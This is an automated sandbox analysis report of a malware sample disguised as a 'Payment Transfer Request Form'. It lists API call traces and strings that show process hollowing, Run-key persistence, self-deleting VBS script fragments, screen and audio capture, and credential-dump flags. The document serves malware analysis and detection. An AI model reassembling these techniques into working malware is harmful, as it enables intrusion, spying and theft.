                                                • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0044F4C1,00000000,00000000,?), ref: 0044F74F
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$InfoLocale_abort_free
                                              • String ID:
                                              • API String ID: 2692324296-0
                                              • Opcode ID: c5ca8868f81a5dafb3fdb259ff2b8ec3965b2bfb8aabdce9695f87c3ae70661f
                                              • Instruction ID: e4b95bc4a5e1061338a04706472302caa06a68982d3ebb8569a44a178f9f49d5
                                              • Opcode Fuzzy Hash: c5ca8868f81a5dafb3fdb259ff2b8ec3965b2bfb8aabdce9695f87c3ae70661f
                                              • Instruction Fuzzy Hash: 09F02D36600516BBFB245B65DC05BBB7768EF40764F05447AEC19A3240EA7CFD05C6D4
                                              APIs
                                                • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                              • EnumSystemLocalesW.KERNEL32(0044F4F3,00000001,?,?,00441F7E,?,0044F894,00441F7E,?,?,?,?,?,00441F7E,?,?), ref: 0044F262
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                              • String ID:
                                              • API String ID: 1084509184-0
                                              • Opcode ID: d9e72da5ca64d0dbd4f9725887adba7bc59a573407832ad1990d17eaaac4c4d9
                                              • Instruction ID: 7c38563944de2097393583401858843e6c2e12a799e64e453201a09b71e8bce8
                                              • Opcode Fuzzy Hash: d9e72da5ca64d0dbd4f9725887adba7bc59a573407832ad1990d17eaaac4c4d9
                                              • Instruction Fuzzy Hash: 44F0223A2007045FEB145F399881A7B7B94FF8036CB15447EF9458B690DAB6AC068614
                                              APIs
                                              • GetUserNameW.ADVAPI32(?,00000010), ref: 0041962D
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: NameUser
                                              • String ID:
                                              • API String ID: 2645101109-0
                                              • Opcode ID: 8951ed9e5e96f4eef37346a31dc1e1cfc055faec67558bb1b1f4eabc83ab8062
                                              • Instruction ID: 5ca8c18713c22ae7facf93a828c8627c995cdb1c7496207664ac88b3b4335c79
                                              • Opcode Fuzzy Hash: 8951ed9e5e96f4eef37346a31dc1e1cfc055faec67558bb1b1f4eabc83ab8062
                                              • Instruction Fuzzy Hash: 7C01FF7290011CABCB04EBD5DC45EDEB7BCEF44319F10016AB505B61A5EEB46A89CB98
                                              APIs
                                                • Part of subcall function 00442D9A: EnterCriticalSection.KERNEL32(?,?,004404DB,00000000,0046B4D8,0000000C,00440496,?,?,?,00443038,?,?,004457DA,00000001,00000364), ref: 00442DA9
                                              • EnumSystemLocalesW.KERNEL32(004458CE,00000001,0046B680,0000000C), ref: 0044594C
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                              • String ID:
                                              • API String ID: 1272433827-0
                                              • Opcode ID: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
                                              • Instruction ID: 57fcd2d1ba6fdacad71b84952267562ddc6b8062f8818d57533dd41bf3368d71
                                              • Opcode Fuzzy Hash: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
                                              • Instruction Fuzzy Hash: CFF03C72A10700EFEB00EF69D846B5D77F0EB08325F10402AF400DB2A2DAB989448B5E
                                              APIs
                                                • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                              • EnumSystemLocalesW.KERNEL32(0044F087,00000001,?,?,?,0044F8F2,00441F7E,?,?,?,?,?,00441F7E,?,?,?), ref: 0044F167
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                              • String ID:
                                              APIs
                                              • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00413F34,00471E78,00472910,00471E78,00000000,00471E78,00000000,00471E78,3.8.0 Pro), ref: 0040E2CF
                                              Yara matches
                                              Similarity
                                              • API ID: InfoLocale
                                              • String ID:
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00032908,0043262F), ref: 00432901
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              APIs
                                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00416E98
                                              • CreateCompatibleDC.GDI32(00000000), ref: 00416EA5
                                                • Part of subcall function 004172DF: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 0041730F
                                              • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00416F1B
                                              • DeleteDC.GDI32(00000000), ref: 00416F32
                                              • DeleteDC.GDI32(00000000), ref: 00416F35
                                              • DeleteObject.GDI32(00000000), ref: 00416F38
                                              • SelectObject.GDI32(00000000,00000000), ref: 00416F59
                                              • DeleteDC.GDI32(00000000), ref: 00416F6A
                                              • DeleteDC.GDI32(00000000), ref: 00416F6D
                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00416F91
                                              • GetIconInfo.USER32(?,?), ref: 00416FC5
                                              • DeleteObject.GDI32(?), ref: 00416FF4
                                              • DeleteObject.GDI32(?), ref: 00417001
                                              • DrawIcon.USER32(00000000,?,?,?), ref: 0041700E
                                              • GetObjectA.GDI32(00000000,00000018,?), ref: 00417026
                                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 00417095
                                              • GlobalAlloc.KERNEL32(00000000,?), ref: 00417104
                                              • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00417128
                                              • DeleteDC.GDI32(?), ref: 0041713C
                                              • DeleteDC.GDI32(00000000), ref: 0041713F
                                              • DeleteObject.GDI32(00000000), ref: 00417142
                                              • GlobalFree.KERNEL32(?), ref: 0041714D
                                              • DeleteObject.GDI32(00000000), ref: 00417201
                                              • GlobalFree.KERNEL32(?), ref: 00417208
                                              • DeleteDC.GDI32(?), ref: 00417218
                                              • DeleteDC.GDI32(00000000), ref: 00417223
                                              Strings
                                              Yara matches
                                              Similarity
                                              • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                              • String ID: DISPLAY
                                              APIs
                                              • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00416474
                                              • GetProcAddress.KERNEL32(00000000), ref: 00416477
                                              • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00416488
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041648B
                                              • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041649C
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041649F
                                              • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004164B0
                                              • GetProcAddress.KERNEL32(00000000), ref: 004164B3
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00416555
                                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041656D
                                              • GetThreadContext.KERNEL32(?,00000000), ref: 00416583
                                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004165A9
                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041662B
                                              • TerminateProcess.KERNEL32(?,00000000), ref: 0041663F
                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041667F
                                              • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00416749
                                              • SetThreadContext.KERNEL32(?,00000000), ref: 00416766
                                              • ResumeThread.KERNEL32(?), ref: 00416773
                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041678A
                                              • GetCurrentProcess.KERNEL32(?), ref: 00416795
                                              • TerminateProcess.KERNEL32(?,00000000), ref: 004167B0
                                              • GetLastError.KERNEL32 ref: 004167B8
                                              Strings
                                              Yara matches
                                              Similarity
                                              • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                              • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                              APIs
                                                • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
                                                • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C0D6
                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C0E9
                                              • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040C102
                                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040C132
                                                • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(00409305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
                                                • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
                                                • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823
                                                • Part of subcall function 0041A17B: CreateFileW.KERNELBASE(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C37D
                                              • ExitProcess.KERNEL32 ref: 0040C389
                                              Strings
                                              Yara matches
                                              Similarity
                                              • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                              • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$t<F$wend$while fso.FileExists("
                                              APIs
                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,00472200,00471FFC,00000000), ref: 00410EF9
                                              • ExitProcess.KERNEL32(00000000), ref: 00410F05
                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00410F7F
                                              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00410F8E
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00410F99
                                              • CloseHandle.KERNEL32(00000000), ref: 00410FA0
                                              • GetCurrentProcessId.KERNEL32 ref: 00410FA6
                                              • PathFileExistsW.SHLWAPI(?), ref: 00410FD7
                                              • GetTempPathW.KERNEL32(00000104,?), ref: 0041103A
                                              • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 00411054
                                              • lstrcatW.KERNEL32(?,.exe), ref: 00411066
                                                • Part of subcall function 0041A17B: CreateFileW.KERNELBASE(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
                                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004110A6
                                              • Sleep.KERNEL32(000001F4), ref: 004110E7
                                              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004110FC
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411107
                                              • CloseHandle.KERNEL32(00000000), ref: 0041110E
                                              • GetCurrentProcessId.KERNEL32 ref: 00411114
                                              Strings
                                              Yara matches
                                              Similarity
                                              • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                              • String ID: (#G$.exe$H"G$WDH$exepath$open$temp_
                                              APIs
                                                • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
                                                • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BD63
                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040BD76
                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDA6
                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDB5
                                                • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(00409305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
                                                • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
                                                • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823
                                                • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BFD0
                                              • ExitProcess.KERNEL32 ref: 0040BFD7
                                              Strings
                                              Yara matches
                                              Similarity
                                              • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                              • String ID: ")$.vbs$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                              APIs
                                              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 004190F2
                                              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00419106
                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00463050), ref: 0041912E
                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00471E78,00000000), ref: 00419144
                                              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00419185
                                              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041919D
                                              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 004191B2
                                              • SetEvent.KERNEL32 ref: 004191CF
                                              • WaitForSingleObject.KERNEL32(000001F4), ref: 004191E0
                                              • CloseHandle.KERNEL32 ref: 004191F0
                                              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00419212
                                              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041921C
                                              Strings
                                              Yara matches
                                              Similarity
                                              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                              • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                                              • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401AE3
                                              • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401AF3
                                              • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B03
                                              • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B13
                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B23
                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B34
                                              • WriteFile.KERNEL32(00000000,0046FA9A,00000002,00000000,00000000), ref: 00401B45
                                              • WriteFile.KERNEL32(00000000,0046FA9C,00000004,00000000,00000000), ref: 00401B55
                                              • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B65
                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B76
                                              • WriteFile.KERNEL32(00000000,0046FAA6,00000002,00000000,00000000), ref: 00401B87
                                              • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401B97
                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BA7
                                              Strings
                                              Yara matches
                                              Similarity
                                              • API ID: File$Write$Create
                                              • String ID: RIFF$WAVE$data$fmt
                                              APIs
                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
                                              • LoadLibraryA.KERNEL32(?), ref: 0041386D
                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
                                              • FreeLibrary.KERNEL32(00000000), ref: 00413894
                                              • LoadLibraryA.KERNEL32(?), ref: 004138CC
                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
                                              • FreeLibrary.KERNEL32(00000000), ref: 004138E5
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004138F4
                                              • FreeLibrary.KERNEL32(00000000), ref: 0041390B
                                              Strings
                                              Yara matches
                                              Similarity
                                              • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                              • String ID: \ws2_32$\wship6$`3A$freeaddrinfo$getaddrinfo$getnameinfo
                                              APIs
                                              Yara matches
                                              Similarity
                                              • API ID: _free$EnvironmentVariable$_wcschr
                                              • String ID:
                                              APIs
                                              • ___free_lconv_mon.LIBCMT ref: 0044E4EA
                                                • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D6FF
                                                • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D711
                                                • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D723
                                                • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D735
                                                • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D747
                                                • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D759
                                                • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D76B
                                                • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D77D
                                                • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D78F
                                                • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7A1
                                                • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7B3
                                                • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7C5
                                                • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7D7
                                              • _free.LIBCMT ref: 0044E4DF
                                                • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                              • _free.LIBCMT ref: 0044E501
                                              • _free.LIBCMT ref: 0044E516
                                              • _free.LIBCMT ref: 0044E521
                                              • _free.LIBCMT ref: 0044E543
                                              • _free.LIBCMT ref: 0044E556
                                              • _free.LIBCMT ref: 0044E564
                                              • _free.LIBCMT ref: 0044E56F
                                              • _free.LIBCMT ref: 0044E5A7
                                              • _free.LIBCMT ref: 0044E5AE
                                              • _free.LIBCMT ref: 0044E5CB
                                              • _free.LIBCMT ref: 0044E5E3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                              • String ID: pF
                                              • API String ID: 161543041-2973420481
                                              • Opcode ID: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                                              • Instruction ID: 6e8371ae3b83bc2427c047bff221b97f6cd80994471b0a2caeb41cff5b169df7
                                              • Opcode Fuzzy Hash: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                                              • Instruction Fuzzy Hash: D4315072500304AFFB205E7AD945B5BB3E5BF00719F55851FE488D6251EE39ED408B18
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004118B2
                                                • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                                                • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                                                • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                                              • Sleep.KERNEL32(0000000A,00462E24), ref: 00411A01
                                              • Sleep.KERNEL32(0000000A,00462E24,00462E24), ref: 00411AA3
                                              • Sleep.KERNEL32(0000000A,00462E24,00462E24,00462E24), ref: 00411B42
                                              • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411B9F
                                              • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411BCF
                                              • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411C05
                                              • Sleep.KERNEL32(000001F4,00462E24,00462E24,00462E24), ref: 00411C25
                                              • Sleep.KERNEL32(00000064), ref: 00411C63
                                                • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                              • String ID: /stext "$$.F$@#G$@#G
                                              • API String ID: 1223786279-2596709126
                                              • Opcode ID: bd53cf9864bd20e9c524ce1cfd37af81de888470282f81bcb092bebe0936cb7c
                                              • Instruction ID: f36e1428a9e5a2dc2e21cca38a330b771dfaab2ce7ac60874593ee94e899fa44
                                              • Opcode Fuzzy Hash: bd53cf9864bd20e9c524ce1cfd37af81de888470282f81bcb092bebe0936cb7c
                                              • Instruction Fuzzy Hash: 1CF154311083415AD328FB65D896AEFB3D5AFD0348F40093FF586521E2EF789A4DC69A
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free
                                              • String ID: pF
                                              • API String ID: 269201875-2973420481
                                              • Opcode ID: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
                                              • Instruction ID: 42ad863364e9847d0c0ab7d3fc56807329b255bf3c924c15ca724e031f0c4a7b
                                              • Opcode Fuzzy Hash: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
                                              • Instruction Fuzzy Hash: 4CC17576D40204ABEB20DFA9CC82FEE77F8AF09B05F154156FE04FB282D674A9458754
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00472248,00471FFC,?,00000001), ref: 0040DE4E
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000001), ref: 0040DE79
                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040DE95
                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040DF14
                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000001), ref: 0040DF23
                                                • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001), ref: 0040E047
                                              • CloseHandle.KERNEL32(00000000,C:\Program Files(x86)\Internet Explorer\,?,00000001), ref: 0040E133
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                                              • String ID: 0"G$C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$!G
                                              • API String ID: 193334293-3226144251
                                              • Opcode ID: cf6d12ac23d3bea58c4b9e5c443ef1de1d55369046223e9cec53eb66751e9ba7
                                              • Instruction ID: 8a3cf51a80cb2752f7e3b1027b115d9c77e2b7a511041fa54b012784d9d6af0a
                                              • Opcode Fuzzy Hash: cf6d12ac23d3bea58c4b9e5c443ef1de1d55369046223e9cec53eb66751e9ba7
                                              • Instruction Fuzzy Hash: DB8121305083419BCA54FB61D8919EEB7E4AFA0348F40493FF586631E2EF78994DC75A
                                              APIs
                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041A43B
                                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041A47F
                                              • RegCloseKey.ADVAPI32(?), ref: 0041A749
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseEnumOpen
                                              • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                              • API String ID: 1332880857-3714951968
                                              • Opcode ID: 202c19da245d775da939d21b29cef2875a47ec0cac4e3383d9ae15c6a26c9ad4
                                              • Instruction ID: 699f57f5c891f1d806a7f6c627c3d9f808e7165cae3c76f1f7c8ebce292c0808
                                              • Opcode Fuzzy Hash: 202c19da245d775da939d21b29cef2875a47ec0cac4e3383d9ae15c6a26c9ad4
                                              • Instruction Fuzzy Hash: BC8152311183419BC328EB51D891EEFB7E8EF94348F10493FF586921E2EF749949CA5A
                                              APIs
                                              • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041B38F
                                              • GetCursorPos.USER32(?), ref: 0041B39E
                                              • SetForegroundWindow.USER32(?), ref: 0041B3A7
                                              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041B3C1
                                              • Shell_NotifyIconA.SHELL32(00000002,00471AE0), ref: 0041B412
                                              • ExitProcess.KERNEL32 ref: 0041B41A
                                              • CreatePopupMenu.USER32 ref: 0041B420
                                              • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041B435
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
